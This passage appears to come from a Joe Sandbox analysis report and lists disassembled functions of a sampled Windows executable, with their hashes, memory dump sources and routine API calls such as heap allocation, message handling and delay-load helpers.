                                                                                                      • Instruction ID: a9f0502fbeea83b5ae10631c0b73a6d0ffd143553d3a1191d5c9f705662aba0d
                                                                                                      • Opcode Fuzzy Hash: a07cbab229e8143874e11d71ef6d550087d68c140c1e6403a4358524e5be6366
                                                                                                      • Instruction Fuzzy Hash: E2F0B431E85E20EADB21AF768D89BDA3758EFC17E0F184211F81596590CA60D8814AA0
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A123AA,?,0000015D,?,?,?,?,00A12F29,000000FF,00000000,?,?), ref: 00A15A2E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 0facfc9e5c61a4db84093d0ee33493a799352ae492297c17fcb382cea1bee765
                                                                                                      • Instruction ID: e737c3681a0a205a5aeb7217f913156be06017115588f8b9c0ab75d639ee906b
                                                                                                      • Opcode Fuzzy Hash: 0facfc9e5c61a4db84093d0ee33493a799352ae492297c17fcb382cea1bee765
                                                                                                      • Instruction Fuzzy Hash: 86E0E531D80A20DAE6702B75CC89BDA364CAFD13E4F050320AC1696190DB60DCC141A8
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F5B3A
                                                                                                        • Part of subcall function 009FAC66: __EH_prolog.LIBCMT ref: 009FAC6B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: 8d88f50dc655248b1d5aa0511f203816512cb702f5fb4b8f823361a2bb45595c
                                                                                                      • Instruction ID: 40f38cde862c092f0e1932db7e4226f2bd8609f08fb296d5163ea5339aa811cf
                                                                                                      • Opcode Fuzzy Hash: 8d88f50dc655248b1d5aa0511f203816512cb702f5fb4b8f823361a2bb45595c
                                                                                                      • Instruction Fuzzy Hash: 7D01D130A08688DECB04E7A4C0253EDF7E49F97304F10809EA95A23282CBB42B08D763
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009FA174
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: f5e11bd0eb85611433778b5fa4a21e4ff9857bf02ff59b753071d25a2182e4c4
                                                                                                      • Instruction ID: 58c77876494573367f80b240f0a4480546dc9394ff99b713725d45fb01c413fb
                                                                                                      • Opcode Fuzzy Hash: f5e11bd0eb85611433778b5fa4a21e4ff9857bf02ff59b753071d25a2182e4c4
                                                                                                      • Instruction Fuzzy Hash: 52F0E23140C384EECE229BB48804BEB7B946F46331F008A09F3FD42192C27514868723
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F1E93
                                                                                                        • Part of subcall function 009F18F6: __EH_prolog.LIBCMT ref: 009F18FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: a3e05d233cacec1f5b2fddee046e80d9e71662884e9924a042f117658ae46b8e
                                                                                                      • Instruction ID: 81fe1d3384e304a1e359bbdb03c725633478e2f98f0243f7666433f290c24108
                                                                                                      • Opcode Fuzzy Hash: a3e05d233cacec1f5b2fddee046e80d9e71662884e9924a042f117658ae46b8e
                                                                                                      • Instruction Fuzzy Hash: EBF0DFB1C002898ECF40EFA889057EEBBB4AB58300F0402BAE509E3202E7345604CBA1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F1E93
                                                                                                        • Part of subcall function 009F18F6: __EH_prolog.LIBCMT ref: 009F18FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                      • Instruction ID: f2453b63e805721ac6311d78d635629768988af245a05f4fd760331113a5879b
                                                                                                      • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                                      • Instruction Fuzzy Hash: 75F07FB1C012998ECB41DFA889457EEBBB5AB58200F1442AAD509E7202E7355615CB91
                                                                                                      APIs
                                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 009FF927
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecutionStateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2211380416-0
                                                                                                      • Opcode ID: ca3edec3a9793058d764c5cfeaa14e3787a18b804398b4b2072080be1bdf7904
                                                                                                      • Instruction ID: c5c7dcd529d37b1d7be67424e27e644be74d339f89872bcc0c06af891620bb8b
                                                                                                      • Opcode Fuzzy Hash: ca3edec3a9793058d764c5cfeaa14e3787a18b804398b4b2072080be1bdf7904
                                                                                                      • Instruction Fuzzy Hash: A6D0125170422D22DA25776C7E56FBD151B4FC6724F080075B244662D38A95089793A2
                                                                                                      APIs
                                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00A08B6B
                                                                                                        • Part of subcall function 00A08924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A08945
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                      • String ID:
                                                                                                      • API String ID: 1915507550-0
                                                                                                      • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                      • Instruction ID: bb56fb1bc89860f393c45c48e9bdce76340de1aefc9498d4158a5e62a8fe8772
                                                                                                      • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                                      • Instruction Fuzzy Hash: 5AD0A77060010CBBDF406F60AD0297D7BD8DB023A0F404235BC44961D0FE72CD10A255
                                                                                                      APIs
                                                                                                      • GetFileType.KERNELBASE(000000FF,009F964C), ref: 009F9726
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3081899298-0
                                                                                                      • Opcode ID: 29db234522ffa8499b0fe5673dad709629b9d4bd225f29ae3a0450405183cdf2
                                                                                                      • Instruction ID: f0087c06d447ec643cb6a789f6dc6314034442093219e6b143bb02cc8d2a5d72
                                                                                                      • Opcode Fuzzy Hash: 29db234522ffa8499b0fe5673dad709629b9d4bd225f29ae3a0450405183cdf2
                                                                                                      • Instruction Fuzzy Hash: FBD01230032304958E716E385D0957566559B433A6B28DAE4E365C40A1C722C943F740
                                                                                                      APIs
                                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A0BF9C
                                                                                                        • Part of subcall function 00A0991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0992F
                                                                                                        • Part of subcall function 00A0991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A09940
                                                                                                        • Part of subcall function 00A0991E: TranslateMessage.USER32(?), ref: 00A0994A
                                                                                                        • Part of subcall function 00A0991E: DispatchMessageW.USER32(?), ref: 00A09954
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchItemPeekSendTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4142818094-0
                                                                                                      • Opcode ID: f347f56e1bef38cab1c6eaf86f1933e7acb5e4477c6e43e2c9d61c4fa161a26e
                                                                                                      • Instruction ID: 6b8efc3dfe7c071bdefaf203affd8d910b0c63f966dcc06f47ff3ca1df98880d
                                                                                                      • Opcode Fuzzy Hash: f347f56e1bef38cab1c6eaf86f1933e7acb5e4477c6e43e2c9d61c4fa161a26e
                                                                                                      • Instruction Fuzzy Hash: 36D09232148200FADB126B91DE06F1ABAA2BB98B04F004958B744340F286629E32EB02
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C799
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 0e7a9926e280ae0cac0242a3d1f804a76cab01937c45c8852f1cf613de9aac47
                                                                                                      • Instruction ID: a4d3a28d4c25ea70eb7412398fd059e61bbb62b16004680032d804506724f503
                                                                                                      • Opcode Fuzzy Hash: 0e7a9926e280ae0cac0242a3d1f804a76cab01937c45c8852f1cf613de9aac47
                                                                                                      • Instruction Fuzzy Hash: CFB092A125911AAEA144A2093902C3A0119E190B30370862AB404C0182E8840C408636
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C799
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: c89acb53527d359ec1740449a2191de33b96b80bdf781552a476b5d3582699bd
                                                                                                      • Instruction ID: 7ba7f83dd90421c842e74c58291515846bc5a72e5e4dfc4a7a417e4241a3d943
                                                                                                      • Opcode Fuzzy Hash: c89acb53527d359ec1740449a2191de33b96b80bdf781552a476b5d3582699bd
                                                                                                      • Instruction Fuzzy Hash: DAB012A135951ABFF14493083D42C3B021ED1D1B31370C63FB800C00C2E9840C448432
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C799
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: f70c2a3e6644a2c8f6b59d8e6bf685786e33468267944b161baee1cdcb235503
                                                                                                      • Instruction ID: 63947d0ed335a34528f079a65dd86501ce7a7470b76c8ca3ca9af1dce6b1e0cf
                                                                                                      • Opcode Fuzzy Hash: f70c2a3e6644a2c8f6b59d8e6bf685786e33468267944b161baee1cdcb235503
                                                                                                      • Instruction Fuzzy Hash: E8B012A135D41ABFF144D30C3E02C3B021ED1D0B30370C63FB400C11C2E8880C498532
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 02871f3c8903307f6762996fe414f6f4dcee3545a7cdcce9c7eb1d39952fe2e3
                                                                                                      • Instruction ID: 923ed615cf0f40c107ebdefd6c6380969e1309f993a12aa21c24af55d6e28cac
                                                                                                      • Opcode Fuzzy Hash: 02871f3c8903307f6762996fe414f6f4dcee3545a7cdcce9c7eb1d39952fe2e3
                                                                                                      • Instruction Fuzzy Hash: 1AB012B1369329BDF90893483E42C37011CC5D0F70330873FB400E40C2E8405C408A32
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 2f6e6147eb9a62f54fe6919ce0a1e04ade120dd39658489226336c49ac9f4cd7
                                                                                                      • Instruction ID: 33bee29b3096a9752f56bfaa2593537849aba859abd6cd419b393b692520cc5f
                                                                                                      • Opcode Fuzzy Hash: 2f6e6147eb9a62f54fe6919ce0a1e04ade120dd39658489226336c49ac9f4cd7
                                                                                                      • Instruction Fuzzy Hash: 52B012A1379119BDF148D30C7E03C3B011CD5C0B70330873FB401D01C2E8404C004232
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 2c820614d03d06996898ee0a883e0d0547ae920cb9436e99b56a66b88048e3dd
                                                                                                      • Instruction ID: 7cb01614a264b74bf94f022ff47ad32dc364f9ae413701a29778573fa9b55374
                                                                                                      • Opcode Fuzzy Hash: 2c820614d03d06996898ee0a883e0d0547ae920cb9436e99b56a66b88048e3dd
                                                                                                      • Instruction Fuzzy Hash: CBB012A1379219BDF548D30C3E02C37011CC5C0F70330C63FB804D11C2E8404C004632
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: d8d88d4c047c689d0b92c91431bc63d51c6fb5c63da42882eaca49ba351f4520
                                                                                                      • Instruction ID: ea3918a782cf42f2c7f67b71ddb223912f16d4bc3c1137098d16039ee163a796
                                                                                                      • Opcode Fuzzy Hash: d8d88d4c047c689d0b92c91431bc63d51c6fb5c63da42882eaca49ba351f4520
                                                                                                      • Instruction Fuzzy Hash: 43B012A1369319BEF548D30C3F02C37011CC5C0F70330863FB404D11C6E8444C014632
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C799
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
